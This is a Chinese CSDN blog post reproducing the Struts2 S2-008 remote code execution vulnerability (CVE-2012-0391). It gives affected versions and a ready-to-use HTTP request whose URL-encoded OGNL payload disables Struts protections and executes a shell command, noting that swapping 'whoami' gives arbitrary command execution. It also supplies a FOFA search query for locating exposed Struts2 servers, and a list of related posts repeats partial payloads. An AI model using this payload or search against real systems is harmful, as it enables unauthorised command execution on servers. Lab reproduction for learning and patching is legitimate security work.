struts-s2-008 代码执行 (CVE-2012-0391)

于 2024-07-16 08:47:54 发布
阅读量196 收藏
点赞数 1
分类专栏: # 命令执行 文章标签: struts java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140455573
版权

一、漏洞概述

Cookie 拦截器错误配置可造成 OGNL 表达式执行,S2-008 涉及多个漏洞,Cookie 拦截器错误配置可造成 OGNL 表达式执行,但是由于大多 Web 容器(如 Tomcat)对 Cookie 名称都有字符限制,一些关键字符无法使用使得这个点显得比较鸡肋。另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模式后会有多个调试接口能够直接查看对象信息或直接执行命令。

二、漏洞范围

Struts 2.1.0 - Struts 2.3.1

三、漏洞复现

GET /devmode.action?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22whoami%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close() HTTP/1.1
Host: 123.58.224.8:51294
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: metabase.DEVICE=47be73da-b525-49e6-beec-0c5b291b2e3c; _ga=GA1.1.2097748309.1721011407; _gid=GA1.1.352847630.1721011407; JSESSIONID=3B66FB41CF4B26F3475EADF76D1DF31E
Connection: close

通过修改whoami达到任意命令执行。

四、漏洞利用

1、fofa:app="struts2"

风中追风-fzzf
关注
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008CVE-2012-0391
qq_51577576的博客
10-15 1098
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008CVE-2012-0391S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-007(CVE-2012-0838)
qq_51577576的博客
10-13 1428
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-007(CVE-2012-0838) S2-007和S2-003、S2-005的漏洞源头都是一样的,都是struts2对OGNL的解析过程中存在漏洞 当用户提交 age 为字符串而非整形数值时,后端代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式
【vulhub】S2-008漏洞复现
qq_45300786的博客
07-08 437
poc http://192.168.100.23:8080/devmode.action?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true
vulhub-struts2-S2-008 远程代码执行漏洞复现
qq_56426046的博客
06-19 492
影响版本: 2.1.0 - 2.3.1。
墨者学院-Apache Struts2远程代码执行漏洞(S2-008)复现
JimWu的博客
09-04 1596
Apache Struts2远程代码执行漏洞(S2-008)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器、360安全浏览器 漏洞原理:为了防止攻击者在参数中调用任意方法,标志xwork.MethodAccessor.denyMethodExecution被设置为true,并且SecurityMemberAccess字段默认allowStaticMethodAccess设...
struts2(s2-001)远程代码执行漏洞docker&&vulhub复现
qq_43455259的博客
07-12 1988
struts2(s2-001)远程代码执行漏洞docker&&vulhub复现
Apache Struts2远程代码执行漏洞(S2-008)复现
qq_36933272的博客
09-05 1324
漏洞原理:主要是利用对传入参数没有严格限制,导致多个地方可以执行恶意代码,传入?debug=command&expression=即可执行OGNL表达式 寻找poc:debug=command&expression=%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_...
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923)
qq_51577576的博客
10-16 778
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923) Struts2框架中ParametersInterceptor拦截器只检查传入的参数名是否合法,不会检查参数值.例如传入参数top[‘foo’](0)会通过ParametersInterceptor的白名单检查,OGNL会将其解析为(top[‘foo’])(0),并将foo的值也作为OGNL表达式进行计算从而造成代码执行.
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870)
qq_51577576的博客
10-14 1049
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870) s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用
Struts2 S2-057 远程代码执行漏洞(CVE-2018-11776)
玄道的网安博客
06-30 794
影响环境 Struts<= Struts 2.3.34, Struts 2.5.16 环境搭建 cd vulhub/struts2/s2-057 docker-compose up -d 启动环境后,访问http://your-ip: 8080/show/,您将看到Struts2测试页面。 利用 S2-057要求具备以下条件: action元素没有设置名称空间属性,或者使用了通配符 名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。 Pa..
Struts2远程代码执行漏洞
weixin_46801402的博客
11-01 544
Struts2远程代码执行漏洞
Struts2_012_RCE CVE-2012-0391 漏洞复现
ADummy的博客
02-18 815
Struts2_012_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行—>有回显 0x01漏洞介绍 ​ 如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,例如: <package name="S2-012" extends="struts-default"> <action name="user" class=
Struts2 devMode导致远程代码执行漏洞
煜铭2011
07-20 1万+
一、漏洞基本信息 CVE编号:暂无 漏洞名称:Struts2 devMode导致远程代码执行漏洞 漏洞发布日期:2016.06 受影响的软件及系统:在开启devMode情况下,本漏洞可影响Struts 2.1.0--2.5.1,通杀Struts2所有版本 漏洞概述:Apache Struts 2是世界上最流行的Java Web服务器框架之一。Apache Struts2在使用REST插件
struts2远程代码执行漏洞汇总整理
热门推荐
dl71181的博客
05-30 1万+
一、S2-001 1、漏洞原理 在默认配置下,如果用户所提交的表单出现验证错误,后端会对用户的输入进行解析处理,然后返回并显示处理结果。 举个例子,当你提交的登录表单为username=xishir&password=%{1+1}时,后端验证登录失败后会返回登录界面并显示你的输入,这时password字段中的OGNL表达式已经被解析处理过了,所以会显示%{1+1}的解析结果2...
Struts2 devMode远程代码执行漏洞检测利用
Fly_鹏程万里
12-14 2552
Apache Struts 2是世界上最流行的Java Web服务器框架之一,当Struts2开启devMode模式时,将导致严重远程代码执行漏洞。如果WebService 启动权限为最高权限时,可远程执行任意命令,包括关机、建立新用户、以及删除服务器上所有文件等等。 什么是devMode? 所谓的devMode模式,看名称也知道,是为Struts2开发人员调试程序准备的,在此模式下可...
struts2远程代码执行漏洞简要回顾
networkangle的专栏
07-15 2724
apache官方安全公告页面: http://struts.apache.org/development/2.x/docs/security-bulletins.html 其中涉及代码执行的漏洞有:S2-003,S2-005,S2-007,S2-008S2-009,S2-012~S2-016,下面逐一简要说明。 一、S2-003 受影响版本:低于Struts 2.0.12
Struts S2-008复现
ZJT6666666的博客
12-21 282
Struts S2-008复现
vulhub-S2-008 远程代码执行漏洞-漏洞复现
wocao___的博客
02-22 575
S2-008 远程代码执行漏洞 影响版本: 2.1.0 - 2.3.1 测试环境搭建 docker-compose up -d 原理 S2-008 涉及多个漏洞,Cookie 拦截器错误配置可造成 OGNL 表达式执行,但是由于大多 Web 容器(如 Tomcat)对 Cookie 名称都有字符限制,一些关键字符无法使用使得这个点显得比较鸡肋。另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模 式后会有多个调试接口能够直接查看对象信息或直接执行命令,正如 kxlzx 所提这种情况在生
struts2 代码执行CVE-2021-31805)
最新发布
06-25
CVE-2021-31805是一个严重的安全漏洞,它被称为Struts2漏洞或“S2-057”,影响了Struts 2.3.28及更低版本。这个漏洞涉及到远程代码执行(RCE),攻击者可以通过发送恶意请求到受影响的应用中,利用此漏洞来执行任意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值